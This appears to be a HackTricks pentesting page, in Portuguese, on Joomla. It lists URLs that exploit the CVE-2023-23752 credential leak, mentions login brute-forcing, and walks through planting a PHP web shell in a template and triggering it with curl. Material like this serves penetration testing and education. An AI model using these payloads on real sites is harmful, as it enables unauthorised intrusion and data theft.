Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
O Joomla coleta algumas estatísticas de uso anônimas, como a distribuição das versões do Joomla, PHP e dos sistemas de gerenciamento de banco de dados e sistemas operacionais de servidor em uso nas instalações do Joomla. Esses dados podem ser consultados através de sua API pública.
Verifique o meta
robots.txt
README.txt
Em /administrator/manifests/files/joomla.xml você pode ver a versão.
Em /language/en-GB/en-GB.xml você pode obter a versão do Joomla.
Em plugins/system/cache/cache.xml você pode ver uma versão aproximada.
Em 80,443 - A metodologia de pentesting web é uma seção sobre scanners de CMS que podem escanear Joomla.
Versões de 4.0.0 a 4.2.7 são vulneráveis à divulgação de informações não autenticadas (CVE-2023-23752) que irá despejar credenciais e outras informações.
Usuários: http://<host>/api/v1/users?public=true
Arquivo de Configuração: http://<host>/api/index.php/v1/config/application?public=true
Módulo MSF: scanner/http/joomla_api_improper_access_checks
ou script ruby: 51334
Você pode usar este script para tentar realizar um ataque de força bruta no login.
Se você conseguiu obter credenciais de admin, você pode RCE dentro dele adicionando um trecho de código PHP para ganhar RCE. Podemos fazer isso personalizando um template.
Clique em Templates
no canto inferior esquerdo sob Configuration
para abrir o menu de templates.
Clique em um nome de template. Vamos escolher protostar
sob o cabeçalho da coluna Template
. Isso nos levará à página Templates: Customise
.
Finalmente, você pode clicar em uma página para abrir o código fonte. Vamos escolher a página error.php
. Vamos adicionar um PHP one-liner para ganhar execução de código da seguinte forma:
system($_GET['cmd']);
Salvar & Fechar
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Script de Exploração Joomla que eleva XSS a RCE ou Outras Vulnerabilidades Críticas. Para mais informações, confira este post. Ele fornece suporte para as Versões Joomla 5.X.X, 4.X.X e 3.X.X, e permite:
Escalação de Privilégios: Cria um usuário no Joomla.
(RCE) Edição de Templates Integrados: Edita Templates Integrados no Joomla.
(Custom) Exploits Personalizados: Exploits Personalizados para Plugins de Terceiros do Joomla.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)